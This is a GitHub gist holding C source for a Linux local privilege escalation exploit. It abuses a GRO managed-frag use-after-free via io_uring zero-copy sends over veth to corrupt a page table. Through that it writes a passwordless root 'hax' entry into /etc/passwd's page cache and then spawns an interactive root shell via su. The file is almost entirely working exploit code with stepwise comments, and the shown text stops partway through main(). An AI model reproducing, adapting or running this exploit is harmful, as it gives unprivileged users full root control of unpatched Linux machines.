Skip to content

Instantly share code, notes, and snippets.

@birdie-github
Forked from lcfr-eth/gro_frag.c
Created May 23, 2026 08:35
Show Gist options
  • Select an option

  • Save birdie-github/214a7b9117db14cb1e2faa8018de4732 to your computer and use it in GitHub Desktop.

Select an option

Save birdie-github/214a7b9117db14cb1e2faa8018de4732 to your computer and use it in GitHub Desktop.
LPE via GRO managed-frag UAF
/*
* gro_frag.c — LPE via GRO managed-frag UAF (io_uring SEND_ZC + veth)
*
* The bug: skb_gro_receive() copies frag descriptors from a ZC skb
* (SKBFL_MANAGED_FRAG_REFS → no per-frag page refs) into a non-ZC
* GRO accumulator. When the accumulator is freed, skb_release_data()
* calls put_page() on each frag — including the stolen ones that never
* had get_page() called. This gives us one extra put_page per merged
* ZC frag: a refcount underflow.
*
* Race window: between ZC notification (page refs from GUP released)
* and GRO accumulator destruction (put_page fires), we clean up the
* page's PTE and page-cache references. The vmsplice pipe reference
* is the one "stolen" by the underflow — leaving a stale read handle
* to a freed physical page.
*
* Exploitation:
* 1. AF_PACKET PACKET_TX_RING (UNMOVABLE pages) + vmsplice + io_uring pin
* 2. Fixed-buf SEND_ZC → GRO merges managed frags into non-ZC seed
* 3. munmap + unpin + close AF_PACKET → pages freed to UNMOVABLE PCP
* 4. pipe_B writes 8 bytes → grabs freed page from UNMOVABLE PCP (CAN_MERGE)
* 5. pipe_A read → put_page frees pipe_B's page back to UNMOVABLE PCP
* 6. mmap /etc/passwd at 2MB-aligned slot → touch → PTE page allocated
* from UNMOVABLE PCP → IS pipe_B's freed page (dirty pagetable)
* 7. tee pipe_B → read PTE[0] → extract /etc/passwd PFN
* 8. CAN_MERGE write to pipe_B → crafted PTE[1] (RW, same PFN)
* 9. Write through crafted PTE → hardware walk bypasses VMA check
* 10. su hax → root
*
* Affected: Linux 6.0+ (unprivileged, requires io_uring)
* Fixed by: 4db79a322db8 ("net: gro: don't merge zcopy skbs")
*
* Tested: Ubuntu 24.04
* Compile: gcc -Wall -O2 -o gro_lpe gro_lpe.c -static -lutil
*/
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/io_uring.h>
#include <poll.h>
#include <pty.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <termios.h>
#include <linux/if_packet.h>
#include <unistd.h>
#include <netinet/tcp.h>
#ifndef IORING_OP_SEND
#define IORING_OP_SEND 26
#endif
#ifndef IORING_OP_SEND_ZC
#define IORING_OP_SEND_ZC 47
#endif
#ifndef IORING_RECVSEND_FIXED_BUF
#define IORING_RECVSEND_FIXED_BUF (1U << 2)
#endif
#ifndef IORING_CQE_F_NOTIF
#define IORING_CQE_F_NOTIF (1U << 3)
#endif
#define PAGE_SIZE 4096
#define RING_ENTRIES 64
#define NUM_PAGES 1
#define BUF_SIZE (NUM_PAGES * PAGE_SIZE)
#define VETH_MTU 4148
#define VETH_IP_A "10.0.0.1"
#define VETH_IP_B "10.0.0.2"
#define LISTEN_PORT 9999
#define PASSWD_PATH "/etc/passwd"
#define BACKUP_PATH "/tmp/.gro_passwd_bak"
#define PAYLOAD "hax::0:0::/root:/bin/sh\n"
#define PAYLOAD_LEN 24
#define PCP_DRAIN_PIPES 256
#define PMD_SIZE (512 * PAGE_SIZE)
struct uring {
int fd;
void *sq_ring, *cq_ring, *sqes_mem;
uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array;
uint32_t *cq_head, *cq_tail, *cq_mask;
struct io_uring_cqe *cqes;
struct io_uring_sqe *sqes;
};
static int uring_setup(struct uring *r)
{
struct io_uring_params p = {0};
r->fd = syscall(__NR_io_uring_setup, RING_ENTRIES, &p);
if (r->fd < 0) return -1;
size_t sq_sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t);
size_t cq_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
size_t sqe_sz = p.sq_entries * sizeof(struct io_uring_sqe);
r->sq_ring = mmap(0, sq_sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE,
r->fd, IORING_OFF_SQ_RING);
r->cq_ring = mmap(0, cq_sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE,
r->fd, IORING_OFF_CQ_RING);
r->sqes_mem = mmap(0, sqe_sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE,
r->fd, IORING_OFF_SQES);
if (r->sq_ring == MAP_FAILED || r->cq_ring == MAP_FAILED ||
r->sqes_mem == MAP_FAILED)
return -1;
r->sq_head = r->sq_ring + p.sq_off.head;
r->sq_tail = r->sq_ring + p.sq_off.tail;
r->sq_mask = r->sq_ring + p.sq_off.ring_mask;
r->sq_array = r->sq_ring + p.sq_off.array;
r->cq_head = r->cq_ring + p.cq_off.head;
r->cq_tail = r->cq_ring + p.cq_off.tail;
r->cq_mask = r->cq_ring + p.cq_off.ring_mask;
r->cqes = r->cq_ring + p.cq_off.cqes;
r->sqes = r->sqes_mem;
return 0;
}
static struct io_uring_sqe *uring_get_sqe(struct uring *r)
{
uint32_t tail = *r->sq_tail;
uint32_t mask = *r->sq_mask;
struct io_uring_sqe *sqe = &r->sqes[tail & mask];
r->sq_array[tail & mask] = tail & mask;
memset(sqe, 0, sizeof(*sqe));
*r->sq_tail = tail + 1;
return sqe;
}
static int uring_submit(struct uring *r, int wait_nr)
{
return syscall(__NR_io_uring_enter, r->fd,
*r->sq_tail - *r->sq_head, wait_nr,
wait_nr ? IORING_ENTER_GETEVENTS : 0, NULL, 0);
}
static int uring_peek_cqe(struct uring *r, struct io_uring_cqe *out)
{
uint32_t head = *r->cq_head;
__sync_synchronize();
if (head != *r->cq_tail) {
*out = r->cqes[head & *r->cq_mask];
__sync_synchronize();
*r->cq_head = head + 1;
return 0;
}
return -1;
}
static int uring_wait_cqes_timeout(struct uring *r, int ms)
{
struct pollfd pfd = { .fd = r->fd, .events = POLLIN };
return poll(&pfd, 1, ms);
}
static int uring_drain_cqes(struct uring *r, int *send_ok, int *notifs, int timeout_ms)
{
*send_ok = 0;
*notifs = 0;
int total = 0;
for (int round = 0; round < 50; round++) {
struct io_uring_cqe cqe;
while (uring_peek_cqe(r, &cqe) == 0) {
total++;
if (cqe.flags & IORING_CQE_F_NOTIF)
(*notifs)++;
else if (cqe.res >= 0)
(*send_ok)++;
else
fprintf(stderr, " CQE error: res=%d (%s)\n",
cqe.res, strerror(-cqe.res));
}
if (uring_wait_cqes_timeout(r, timeout_ms / 50 + 1) <= 0)
break;
}
return total;
}
static int write_file(const char *path, const char *data)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return -1;
int len = strlen(data);
int ret = (write(fd, data, len) == len) ? 0 : -1;
close(fd);
return ret;
}
/* ---- receiver child: separate netns with veth1 (TCP) ---- */
static void child_receiver(int sync_rd, int sync_wr)
{
char buf;
if (unshare(CLONE_NEWNET) < 0) _exit(1);
(void)!write(sync_wr, "R", 1);
if (read(sync_rd, &buf, 1) != 1) _exit(1);
(void)!system("ip link set lo up");
char mtu_cmd[64];
snprintf(mtu_cmd, sizeof(mtu_cmd), "ip link set veth1 mtu %d", VETH_MTU);
(void)!system(mtu_cmd);
(void)!system("ip addr add " VETH_IP_B "/24 dev veth1");
(void)!system("ip link set veth1 up");
(void)!system("ethtool -K veth1 gro on 2>/dev/null");
int ls = socket(AF_INET, SOCK_STREAM, 0);
int one = 1;
setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
int rcvbuf = 4 * 1024 * 1024;
setsockopt(ls, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf));
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(LISTEN_PORT),
};
inet_pton(AF_INET, VETH_IP_B, &addr.sin_addr);
bind(ls, (void *)&addr, sizeof(addr));
listen(ls, 1);
(void)!write(sync_wr, "L", 1);
int s = accept(ls, NULL, NULL);
close(ls);
if (s < 0) _exit(1);
(void)!write(sync_wr, "A", 1);
/* Wait for parent to signal us to drain */
if (read(sync_rd, &buf, 1) != 1) { close(s); _exit(1); }
char rbuf[65536];
struct timeval tv = {.tv_sec = 2};
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
while (recv(s, rbuf, sizeof(rbuf), 0) > 0)
;
close(s);
(void)!write(sync_wr, "D", 1);
_exit(0);
}
/* ---- backup / restore ---- */
static int do_backup(void)
{
int src = open(PASSWD_PATH, O_RDONLY);
if (src < 0) { perror("open passwd"); return -1; }
int dst = open(BACKUP_PATH, O_WRONLY|O_CREAT|O_TRUNC, 0600);
if (dst < 0) { perror("create backup"); close(src); return -1; }
char buf[4096];
ssize_t n;
while ((n = read(src, buf, sizeof(buf))) > 0)
(void)!write(dst, buf, n);
close(src);
close(dst);
return 0;
}
static int do_restore(void)
{
int src = open(BACKUP_PATH, O_RDONLY);
if (src < 0) return -1;
int dst = open(PASSWD_PATH, O_WRONLY|O_TRUNC);
if (dst < 0) { close(src); return -1; }
char buf[4096];
ssize_t n;
while ((n = read(src, buf, sizeof(buf))) > 0)
(void)!write(dst, buf, n);
close(src);
close(dst);
unlink(BACKUP_PATH);
return 0;
}
/* ---- pty relay for interactive root shell ---- */
static void relay_pty(int master)
{
struct termios old_tio, raw_tio;
tcgetattr(STDIN_FILENO, &old_tio);
raw_tio = old_tio;
cfmakeraw(&raw_tio);
tcsetattr(STDIN_FILENO, TCSANOW, &raw_tio);
fd_set fds;
char buf[4096];
for (;;) {
FD_ZERO(&fds);
FD_SET(STDIN_FILENO, &fds);
FD_SET(master, &fds);
if (select(master + 1, &fds, NULL, NULL, NULL) < 0) break;
if (FD_ISSET(master, &fds)) {
ssize_t n = read(master, buf, sizeof(buf));
if (n <= 0) break;
(void)!write(STDOUT_FILENO, buf, n);
}
if (FD_ISSET(STDIN_FILENO, &fds)) {
ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
if (n <= 0) break;
(void)!write(master, buf, n);
}
}
tcsetattr(STDIN_FILENO, TCSANOW, &old_tio);
}
/* ---- trigger GRO UAF and corrupt page cache ---- */
static int do_corrupt(int done_wr, int wait_rd)
{
uid_t real_uid = getuid();
gid_t real_gid = getgid();
cpu_set_t cpus;
CPU_ZERO(&cpus);
CPU_SET(0, &cpus);
sched_setaffinity(0, sizeof(cpus), &cpus);
/* ---- enter user+net namespace ---- */
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
fprintf(stderr, "[-] unshare: %s\n", strerror(errno));
return -1;
}
write_file("/proc/self/setgroups", "deny");
char mapbuf[64];
snprintf(mapbuf, sizeof(mapbuf), "0 %d 1", real_uid);
write_file("/proc/self/uid_map", mapbuf);
snprintf(mapbuf, sizeof(mapbuf), "0 %d 1", real_gid);
write_file("/proc/self/gid_map", mapbuf);
/* ---- veth pair ---- */
(void)!system("ip link add veth0 type veth peer name veth1");
int p2c[2], c2p[2];
(void)!pipe(p2c);
(void)!pipe(c2p);
pid_t child = fork();
if (child < 0) return -1;
if (child == 0) {
close(p2c[1]); close(c2p[0]);
child_receiver(p2c[0], c2p[1]);
_exit(0);
}
close(p2c[0]); close(c2p[1]);
char sync;
(void)!read(c2p[0], &sync, 1);
char cmd[256];
snprintf(cmd, sizeof(cmd), "ip link set veth1 netns %d", child);
(void)!system(cmd);
(void)!system("ip link set lo up");
snprintf(cmd, sizeof(cmd), "ip link set veth0 mtu %d", VETH_MTU);
(void)!system(cmd);
(void)!system("ip addr add " VETH_IP_A "/24 dev veth0");
(void)!system("ip link set veth0 up");
(void)!system("ethtool -K veth0 tso off gso off gro off 2>/dev/null");
if (system("tc qdisc add dev veth0 root netem delay 50ms") != 0)
fprintf(stderr, "[!] tc netem failed — packets won't be batched\n");
(void)!write(p2c[1], "G", 1);
(void)!read(c2p[0], &sync, 1);
fprintf(stderr, "[+] veth pair ready (MTU %d, netem 50ms, GRO on receiver)\n", VETH_MTU);
/* ---- TCP connect (receiver is listening) ---- */
int client = socket(AF_INET, SOCK_STREAM, 0);
int one_tcp = 1;
setsockopt(client, SOL_SOCKET, SO_ZEROCOPY, &one_tcp, sizeof(one_tcp));
setsockopt(client, IPPROTO_TCP, TCP_NODELAY, &one_tcp, sizeof(one_tcp));
int sndbuf = 2 * 1024 * 1024;
setsockopt(client, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf));
struct sockaddr_in saddr = {
.sin_family = AF_INET,
.sin_port = htons(LISTEN_PORT),
};
inet_pton(AF_INET, VETH_IP_B, &saddr.sin_addr);
if (connect(client, (void *)&saddr, sizeof(saddr)) < 0) {
fprintf(stderr, "[-] TCP connect: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
/* Wait for child to accept */
(void)!read(c2p[0], &sync, 1);
fprintf(stderr, "[+] TCP connection established\n");
/* ---- create AF_PACKET TX ring buffer (UNMOVABLE pages) ---- */
int pf = socket(AF_PACKET, SOCK_RAW, 0);
if (pf < 0) {
fprintf(stderr, "[-] AF_PACKET socket: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
struct tpacket_req treq = {
.tp_block_size = PAGE_SIZE,
.tp_block_nr = NUM_PAGES,
.tp_frame_size = PAGE_SIZE,
.tp_frame_nr = NUM_PAGES,
};
if (setsockopt(pf, SOL_PACKET, PACKET_TX_RING, &treq, sizeof(treq)) < 0) {
fprintf(stderr, "[-] PACKET_TX_RING: %s\n", strerror(errno));
close(pf); kill(child, SIGKILL); return -1;
}
void *zc_buf = mmap(NULL, BUF_SIZE, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_POPULATE, pf, 0);
if (zc_buf == MAP_FAILED) {
fprintf(stderr, "[-] AF_PACKET mmap: %s\n", strerror(errno));
close(pf); kill(child, SIGKILL); return -1;
}
for (int i = 0; i < NUM_PAGES; i++)
memset((char *)zc_buf + i * PAGE_SIZE, 'A' + i, PAGE_SIZE);
fprintf(stderr, "[+] AF_PACKET TX ring at %p (%d UNMOVABLE pages)\n", zc_buf, NUM_PAGES);
/* ---- vmsplice pages into pipe (stale read ref after free) ---- */
int leak_pipe[2];
if (pipe(leak_pipe) < 0) {
fprintf(stderr, "[-] pipe: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
/* make pipe large enough */
fcntl(leak_pipe[0], F_SETPIPE_SZ, BUF_SIZE * 2);
struct iovec splice_iov[NUM_PAGES];
for (int i = 0; i < NUM_PAGES; i++) {
splice_iov[i].iov_base = (char *)zc_buf + i * PAGE_SIZE;
splice_iov[i].iov_len = PAGE_SIZE;
}
ssize_t spliced = vmsplice(leak_pipe[1], splice_iov, NUM_PAGES, 0);
if (spliced < 0) {
fprintf(stderr, "[-] vmsplice: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
fprintf(stderr, "[+] vmsplice'd %zd bytes into pipe (stale ref)\n", spliced);
/* ---- io_uring + register buffer (pins pages) ---- */
struct uring ring;
if (uring_setup(&ring) < 0) {
fprintf(stderr, "[-] io_uring_setup: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
struct iovec iov = { .iov_base = zc_buf, .iov_len = BUF_SIZE };
if (syscall(__NR_io_uring_register, ring.fd,
IORING_REGISTER_BUFFERS, &iov, 1) < 0) {
fprintf(stderr, "[-] REGISTER_BUFFERS: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
fprintf(stderr, "[+] registered %d-page buffer (pinned, +1024 refcount each)\n", NUM_PAGES);
/*
* Refcount per page:
* AF_PACKET(1) + mmap_PTE(1) + pipe(1) + pin(1024) = 1027
*
* After exploit:
* GRO(-1) + munmap(-1) + unpin(-1024) + close_AF_PACKET(-1) = -1027
* Final: 0 → page freed, pipe_A has stale ref (UNMOVABLE PCP)
*/
/* ---- submit seed + ZC sends ---- */
static char seed_buf[PAGE_SIZE];
memset(seed_buf, 'S', PAGE_SIZE);
fprintf(stderr, "[*] submitting seed + %d SEND_ZC...\n", NUM_PAGES);
struct io_uring_sqe *sqe = uring_get_sqe(&ring);
sqe->opcode = IORING_OP_SEND;
sqe->fd = client;
sqe->addr = (unsigned long)seed_buf;
sqe->len = PAGE_SIZE;
sqe->msg_flags = MSG_MORE;
sqe->user_data = 99;
for (int i = 0; i < NUM_PAGES; i++) {
sqe = uring_get_sqe(&ring);
sqe->opcode = IORING_OP_SEND_ZC;
sqe->fd = client;
sqe->addr = (unsigned long)zc_buf + i * PAGE_SIZE;
sqe->len = PAGE_SIZE;
sqe->ioprio = IORING_RECVSEND_FIXED_BUF;
sqe->buf_index = 0;
if (i < NUM_PAGES - 1)
sqe->msg_flags = MSG_MORE;
sqe->user_data = 100 + i;
}
int submitted = uring_submit(&ring, 0);
if (submitted < 0) {
fprintf(stderr, "[-] submit: %s\n", strerror(errno));
kill(child, SIGKILL); return -1;
}
fprintf(stderr, "[+] submitted %d SQEs (1 seed + %d ZC)\n", submitted, NUM_PAGES);
/*
* RST race: close socket with SO_LINGER(0) BEFORE netem releases clones.
* TCP RST frees originals in retransmit queue, decrementing dataref on
* each clone's shared_info. After that, skb_cloned(clone) returns FALSE
* → veth's skb_unclone is a no-op → GRO sees MANAGED_FRAG_REFS frags
* without proper page refs → extra put_page on free → refcount underflow.
*/
usleep(5000);
struct linger ling = { .l_onoff = 1, .l_linger = 0 };
setsockopt(client, SOL_SOCKET, SO_LINGER, &ling, sizeof(ling));
close(client);
fprintf(stderr, "[+] RST sent (SO_LINGER 0), originals freed\n");
/* Wait for netem (50ms) + GRO + TCP delivery + skb free */
usleep(300000);
/* Signal receiver to finish, collect its exit */
(void)!write(p2c[1], "D", 1);
usleep(200000);
/* Drain CQEs */
int send_ok = 0, notifs = 0;
uring_drain_cqes(&ring, &send_ok, &notifs, 500);
fprintf(stderr, "[+] CQEs: %d sends, %d notifs\n", send_ok, notifs);
kill(child, SIGTERM);
waitpid(child, NULL, 0);
/* ---- Phase 1: remove PTE mapping ---- */
fprintf(stderr, "[*] munmap AF_PACKET ring (remove PTE refs)...\n");
munmap(zc_buf, BUF_SIZE);
fprintf(stderr, "[*] waiting for RCU grace period...\n");
usleep(500000);
/* Drain UNMOVABLE PCP so our freed pages land on top */
fprintf(stderr, "[*] draining UNMOVABLE PCP via pipe allocations...\n");
int drain_pipes[PCP_DRAIN_PIPES][2];
int drain_count = 0;
for (int i = 0; i < PCP_DRAIN_PIPES; i++) {
if (pipe(drain_pipes[i]) < 0) break;
char c = 'X';
if (write(drain_pipes[i][1], &c, 1) != 1) {
close(drain_pipes[i][0]); close(drain_pipes[i][1]);
break;
}
drain_count++;
}
fprintf(stderr, "[+] drained %d UNMOVABLE pages from PCP\n", drain_count);
/* ---- Phase 2: unpin + close AF_PACKET → pages freed to UNMOVABLE PCP ---- */
fprintf(stderr, "[*] unregistering buffer (unpin)...\n");
syscall(__NR_io_uring_register, ring.fd, IORING_UNREGISTER_BUFFERS, NULL, 0);
close(ring.fd);
fprintf(stderr, "[*] closing AF_PACKET socket (last ref dropped → pages freed)...\n");
close(pf);
fprintf(stderr, "[+] %d pages freed to UNMOVABLE PCP (pipe_A has stale refs)\n", NUM_PAGES);
/*
* ---- Phase 3: pipe_B CAN_MERGE — snatch freed UNMOVABLE page ----
*
* pipe_write allocates from UNMOVABLE PCP (GFP_HIGHUSER, no __GFP_MOVABLE).
* Our freed AF_PACKET pages are also UNMOVABLE → same PCP list → match.
* Write 8 bytes (one PTE entry) so CAN_MERGE append lands at offset 8 = PTE[1].
*/
int pipe_B[2];
if (pipe(pipe_B) < 0) {
fprintf(stderr, "[-] pipe_B: %s\n", strerror(errno));
close(leak_pipe[0]); close(leak_pipe[1]);
return -1;
}
uint64_t filler = 0xDEADBEEFDEADBEEFULL;
ssize_t written = write(pipe_B[1], &filler, 8);
if (written != 8) {
fprintf(stderr, "[-] pipe_B filler write: %zd\n", written);
close(leak_pipe[0]); close(leak_pipe[1]);
close(pipe_B[0]); close(pipe_B[1]);
return -1;
}
fprintf(stderr, "[+] pipe_B: wrote 8-byte filler (CAN_MERGE, snatched UNMOVABLE page)\n");
/*
* ---- Phase 4: free pipe_B's page via pipe_A stale refs ----
*
* pipe_A read → put_page on the single stale vmsplice ref.
* The page (grabbed by pipe_B): refcount 1 → 0 → freed back to UNMOVABLE PCP.
* pipe_B still has stale CAN_MERGE buffer pointing to the freed page.
*/
fprintf(stderr, "[*] reading pipe_A (stale refs) → frees pipe_B's page...\n");
char pipe_data[NUM_PAGES * PAGE_SIZE];
ssize_t total_read = 0;
while (total_read < (ssize_t)sizeof(pipe_data)) {
ssize_t n = read(leak_pipe[0], pipe_data + total_read,
sizeof(pipe_data) - total_read);
if (n <= 0) break;
total_read += n;
}
close(leak_pipe[0]);
close(leak_pipe[1]);
fprintf(stderr, "[+] drained %zd bytes from pipe_A\n", total_read);
/*
* ---- Phase 5: allocate PTE page from UNMOVABLE PCP ----
*
* Map /etc/passwd (MAP_SHARED) at a 2MB-aligned slot 0.
* Touch it → page fault → kernel allocates PTE page from UNMOVABLE PCP.
* PTE page IS pipe_B's freed page. PTE[0] = PFN of /etc/passwd | flags.
* Slot 1 (base+PAGE_SIZE) has no VMA — we'll access it via crafted PTE.
* Hardware PTE walk doesn't check VMAs; only page fault handler does.
*/
void *big = mmap(NULL, 4 * PMD_SIZE, PROT_NONE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (big == MAP_FAILED) {
fprintf(stderr, "[-] reserve mmap: %s\n", strerror(errno));
close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
uintptr_t base_addr = ((uintptr_t)big + PMD_SIZE - 1) & ~(PMD_SIZE - 1);
munmap(big, 4 * PMD_SIZE);
int passwd_fd = open(PASSWD_PATH, O_RDONLY);
if (passwd_fd < 0) {
fprintf(stderr, "[-] open %s: %s\n", PASSWD_PATH, strerror(errno));
close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
void *slot0 = mmap((void *)base_addr, PAGE_SIZE, PROT_READ,
MAP_SHARED | MAP_FIXED, passwd_fd, 0);
if (slot0 == MAP_FAILED) {
fprintf(stderr, "[-] mmap /etc/passwd: %s\n", strerror(errno));
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
fprintf(stderr, "[+] /etc/passwd mapped at %p (2MB-aligned slot 0)\n", slot0);
volatile char touch = *(volatile char *)slot0;
(void)touch;
fprintf(stderr, "[+] slot 0 touched — PTE page allocated from UNMOVABLE PCP\n");
/*
* ---- Phase 6: read PTE[0] via tee, write crafted PTE[1] ----
*
* tee() duplicates pipe_B's buffer to a helper pipe without consuming it.
* Read helper → get PTE[0] (current physical page content, i.e. the PTE entry
* the kernel wrote for /etc/passwd). Extract PFN.
* Then CAN_MERGE write to pipe_B at offset 8 → overwrites PTE[1] with
* crafted entry: same PFN but Present+RW+User+Accessed+Dirty.
*/
int helper[2];
if (pipe(helper) < 0) {
fprintf(stderr, "[-] helper pipe: %s\n", strerror(errno));
munmap(slot0, PAGE_SIZE);
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
ssize_t teed = tee(pipe_B[0], helper[1], 8, 0);
if (teed != 8) {
fprintf(stderr, "[-] tee: %zd (%s)\n", teed, strerror(errno));
munmap(slot0, PAGE_SIZE);
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
close(helper[0]); close(helper[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
uint64_t pte0 = 0;
if (read(helper[0], &pte0, 8) != 8) {
fprintf(stderr, "[-] read PTE[0] from helper: %s\n", strerror(errno));
munmap(slot0, PAGE_SIZE);
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
close(helper[0]); close(helper[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
close(helper[0]); close(helper[1]);
fprintf(stderr, "[+] PTE[0] = 0x%016lx\n", (unsigned long)pte0);
if (!(pte0 & 1)) {
fprintf(stderr, "[-] PTE[0] not present — PTE page mismatch\n");
munmap(slot0, PAGE_SIZE);
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
uint64_t pfn = (pte0 & 0x000FFFFFFFFFF000ULL) >> 12;
fprintf(stderr, "[+] /etc/passwd PFN = 0x%lx (phys 0x%lx)\n",
(unsigned long)pfn, (unsigned long)(pfn << 12));
/* Craft PTE[1]: same PFN, Present+RW+User+Accessed+Dirty */
uint64_t crafted_pte = (pfn << 12) | 0x067;
fprintf(stderr, "[+] crafted PTE[1] = 0x%016lx\n", (unsigned long)crafted_pte);
written = write(pipe_B[1], &crafted_pte, 8);
if (written != 8) {
fprintf(stderr, "[-] pipe_B CAN_MERGE write: %zd\n", written);
munmap(slot0, PAGE_SIZE);
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
fprintf(stderr, "[+] PTE[1] written via CAN_MERGE — dirty pagetable armed\n");
/* Close drain pipes now that PTE is armed */
for (int i = 0; i < drain_count; i++) {
close(drain_pipes[i][0]);
close(drain_pipes[i][1]);
}
/*
* ---- Phase 7: write payload through crafted PTE ----
*
* base+PAGE_SIZE has no VMA but PTE[1] is Present+RW+User.
* Hardware PTE walk succeeds → TLB loaded → write goes to /etc/passwd
* physical page WITHOUT page fault → VMA check never happens.
*/
void *rw_page = (void *)(base_addr + PAGE_SIZE);
/* Read current /etc/passwd content for payload construction */
char real_passwd[PAGE_SIZE];
memset(real_passwd, 0, PAGE_SIZE);
ssize_t passwd_len = pread(passwd_fd, real_passwd, PAGE_SIZE, 0);
if (passwd_len <= 0) {
fprintf(stderr, "[-] pread %s: %s\n", PASSWD_PATH, strerror(errno));
munmap(slot0, PAGE_SIZE);
close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
/* Construct corrupted page: prepend payload before original content.
* We must stay within i_size — appending past EOF is invisible to read(). */
char corrupt_page[PAGE_SIZE];
memset(corrupt_page, 0, PAGE_SIZE);
memcpy(corrupt_page, PAYLOAD, PAYLOAD_LEN);
int remaining = PAGE_SIZE - PAYLOAD_LEN;
if (passwd_len < remaining)
remaining = passwd_len;
memcpy(corrupt_page + PAYLOAD_LEN, real_passwd, remaining);
fprintf(stderr, "[*] writing payload through crafted PTE at %p...\n", rw_page);
memcpy(rw_page, corrupt_page, PAGE_SIZE);
fprintf(stderr, "[+] write succeeded — /etc/passwd page cache corrupted!\n");
/* Verify */
close(passwd_fd);
passwd_fd = open(PASSWD_PATH, O_RDONLY);
char verify[PAGE_SIZE];
memset(verify, 0, PAGE_SIZE);
if (passwd_fd >= 0) {
(void)!read(passwd_fd, verify, PAGE_SIZE);
close(passwd_fd);
}
if (strstr(verify, PAYLOAD)) {
fprintf(stderr, "[+] VERIFIED — hax user injected into /etc/passwd!\n");
(void)!write(done_wr, "OK", 2);
char wait_buf;
(void)!read(wait_rd, &wait_buf, 1);
munmap(slot0, PAGE_SIZE);
close(pipe_B[0]); close(pipe_B[1]);
return 0;
}
fprintf(stderr, "[-] corruption not visible in /etc/passwd\n");
fprintf(stderr, " first 120 bytes: %.120s\n", verify);
munmap(slot0, PAGE_SIZE);
close(pipe_B[0]); close(pipe_B[1]);
(void)!write(done_wr, "NO", 2);
return -1;
}
/* ---- privilege escalation ---- */
static void do_escalate(void)
{
fprintf(stderr, "[*] escalating privileges via su...\n");
int master;
pid_t pid = forkpty(&master, NULL, NULL, NULL);
if (pid < 0) { perror("forkpty"); return; }
if (pid == 0) {
execlp("su", "su", "hax", NULL);
_exit(1);
}
usleep(500000);
char buf[4096];
ssize_t n;
struct timeval tv = {.tv_sec = 2};
fd_set fds;
FD_ZERO(&fds);
FD_SET(master, &fds);
if (select(master + 1, &fds, NULL, NULL, &tv) > 0) {
n = read(master, buf, sizeof(buf) - 1);
if (n > 0) {
buf[n] = '\0';
if (strstr(buf, "Password") || strstr(buf, "password")) {
(void)!write(master, "\n", 1);
usleep(500000);
}
}
}
fprintf(stderr, "[*] restoring /etc/passwd...\n");
char restore_cmd[256];
snprintf(restore_cmd, sizeof(restore_cmd),
"cp %s %s 2>/dev/null; rm -f %s\n", BACKUP_PATH, PASSWD_PATH, BACKUP_PATH);
(void)!write(master, restore_cmd, strlen(restore_cmd));
usleep(500000);
(void)!write(master, "id\n", 3);
usleep(300000);
FD_ZERO(&fds);
FD_SET(master, &fds);
tv.tv_sec = 2;
if (select(master + 1, &fds, NULL, NULL, &tv) > 0) {
n = read(master, buf, sizeof(buf) - 1);
if (n > 0) {
buf[n] = '\0';
if (strstr(buf, "uid=0")) {
fprintf(stderr, "[+] got root! dropping to interactive shell\n\n");
relay_pty(master);
return;
}
}
}
fprintf(stderr, "[-] escalation failed\n");
kill(pid, SIGTERM);
waitpid(pid, NULL, 0);
}
int main(void)
{
fprintf(stderr, "=== GRO managed-frag UAF → LPE ===\n");
fprintf(stderr, "kernels 6.0+ | unprivileged | no BPF\n\n");
fprintf(stderr, "[*] backing up /etc/passwd...\n");
if (do_backup() < 0) {
fprintf(stderr, "[-] backup failed\n");
return 1;
}
fprintf(stderr, "[+] backup at %s\n", BACKUP_PATH);
/* Signaling pipes: child tells parent success/fail, parent tells child to exit */
int done_pipe[2], wait_pipe[2];
if (pipe(done_pipe) < 0 || pipe(wait_pipe) < 0) {
perror("signal pipes");
return 1;
}
pid_t exploit_pid = fork();
if (exploit_pid < 0) { perror("fork"); return 1; }
if (exploit_pid == 0) {
close(done_pipe[0]);
